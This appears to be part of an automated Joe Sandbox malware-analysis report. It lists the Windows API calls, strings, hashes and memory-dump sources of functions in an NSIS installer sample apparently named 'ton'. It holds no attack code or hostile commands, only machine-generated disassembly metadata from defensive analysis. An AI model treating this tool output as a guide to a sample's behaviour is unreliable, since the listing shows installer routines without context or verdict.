                                                                                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429A95,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00012400,00000064,0011E0ED), ref: 00403295
                                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00684C38), ref: 00402387
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                      • String ID: 8Lh$EnabledChuck$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                                                      • API String ID: 1459762280-717216864
                                                                                                                                                                                                                                                                                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00684C38), ref: 00402387
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 1849352358-0
